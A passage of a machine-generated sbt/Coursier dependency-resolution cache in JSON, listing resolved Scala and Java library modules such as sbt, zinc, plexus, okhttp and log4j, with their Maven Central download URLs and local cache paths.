"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"org.eclipse.sisu.plexus\",\"type\":\"eclipse-plugin\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"launcher-interface\",\"revision\":\"1.1.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"launcher-interface\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/launcher-interface/1.1.3/launcher-interface-1.1.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/launcher-interface/1.1.3/launcher-interface-1.1.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://scala-sbt.org\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.pantsbuild\",\"name\":\"jarjar\",\"revision\":\"1.7.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jarjar\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/pantsbuild/jarjar\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.trueaccord.scalapb\",\"name\":\"scalapb-runtime_2.12\",\"revision\":\"0.6.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scalapb-runtime_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/trueaccord/scalapb/scalapb-runtime_2.12/0.6.0/scalapb-runtime_2.12-0.6.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/trueaccord/scalapb/scalapb-runtime_2.12/0.6.0/scalapb-runtime_2.12-0.6.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/scalapb/ScalaPB\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"compiler-interface\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"compiler-interface\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/compiler-interface/1.3.4/compiler-interface-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/compiler-interface/1.3.4/compiler-interface-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.codehaus.plexus\",\"name\":\"plexus-component-annotations\",\"revision\":\"1.5.5\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"plexus-component-annotations\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-control_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-control_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-control_2.12/1.3.3/util-control_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-control_2.12/1.3.3/util-control_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"test-agent\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"test-agent\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/test-agent/1.3.8/test-agent-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/test-agent/1.3.8/test-agent-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-classfile_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-classfile_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-classfile_2.12/1.3.4/zinc-classfile_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-classfile_2.12/1.3.4/zinc-classfile_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-apiinfo_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-apiinfo_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-apiinfo_2.12/1.3.4/zinc-apiinfo_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-apiinfo_2.12/1.3.4/zinc-apiinfo_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"completion_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"completion_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/completion_2.12/1.3.8/completion_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/completion_2.12/1.3.8/completion_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.codehaus.plexus\",\"name\":\"plexus-classworlds\",\"revision\":\"2.5.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"plexus-classworlds\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-compile_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-compile_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-compile_2.12/1.3.4/zinc-compile_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-compile_2.12/1.3.4/zinc-compile_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"io.get-coursier\",\"name\":\"lm-coursier-shaded_2.12\",\"revision\":\"2.0.0-RC5-3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"lm-coursier-shaded_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/io/get-coursier/lm-coursier-shaded_2.12/2.0.0-RC5-3/lm-coursier-shaded_2.12-2.0.0-RC5-3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/io/get-coursier/lm-coursier-shaded_2.12/2.0.0-RC5-3/lm-coursier-shaded_2.12-2.0.0-RC5-3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/coursier/sbt-coursier\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"core-macros_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"core-macros_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/core-macros_2.12/1.3.8/core-macros_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/core-macros_2.12/1.3.8/core-macros_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"run_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"run_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/run_2.12/1.3.8/run_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/run_2.12/1.3.8/run_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.github.cb372\",\"name\":\"scalacache-core_2.12\",\"revision\":\"0.20.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scalacache-core_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/github/cb372/scalacache-core_2.12/0.20.0/scalacache-core_2.12-0.20.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/cb372/scalacache-core_2.12/0.20.0/scalacache-core_2.12-0.20.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/cb372/scalacache\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-position_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-position_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-position_2.12/1.3.3/util-position_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-position_2.12/1.3.3/util-position_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"sjson-new-core_2.12\",\"revision\":\"0.8.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sjson-new-core_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/eed3si9n/sjson-new-core_2.12/0.8.3/sjson-new-core_2.12-0.8.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-core_2.12/0.8.3/sjson-new-core_2.12-0.8.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/eed3si9n/sjson-new\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.typesafe\",\"name\":\"config\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"config\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/typesafe/config/1.3.3/config-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/typesafe/config/1.3.3/config-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/lightbend/config\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"librarymanagement-core_2.12\",\"revision\":\"1.3.1\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"librarymanagement-core_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/librarymanagement-core_2.12/1.3.1/librarymanagement-core_2.12-1.3.1.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/librarymanagement-core_2.12/1.3.1/librarymanagement-core_2.12-1.3.1.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/librarymanagement\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"sbinary_2.12\",\"revision\":\"0.5.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sbinary_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/sbinary_2.12/0.5.0/sbinary_2.12-0.5.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/sbinary_2.12/0.5.0/sbinary_2.12-0.5.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbinary\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.squareup.okhttp3\",\"name\":\"okhttp-urlconnection\",\"revision\":\"3.7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"okhttp-urlconnection\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/squareup/okhttp3/okhttp-urlconnection/3.7.0/okhttp-urlconnection-3.7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okhttp3/okhttp-urlconnection/3.7.0/okhttp-urlconnection-3.7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.logging.log4j\",\"name\":\"log4j-api\",\"revision\":\"2.11.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"log4j-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-api/2.11.2/log4j-api-2.11.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-api/2.11.2/log4j-api-2.11.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.squareup.okio\",\"name\":\"okio\",\"revision\":\"1.17.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"okio\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/squareup/okio/okio/1.17.2/okio-1.17.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okio/okio/1.17.2/okio-1.17.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-interface\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-interface\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-interface/1.3.3/util-interface-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-interface/1.3.3/util-interface-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.logging.log4j\",\"name\":\"log4j-core\",\"revision\":\"2.11.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\"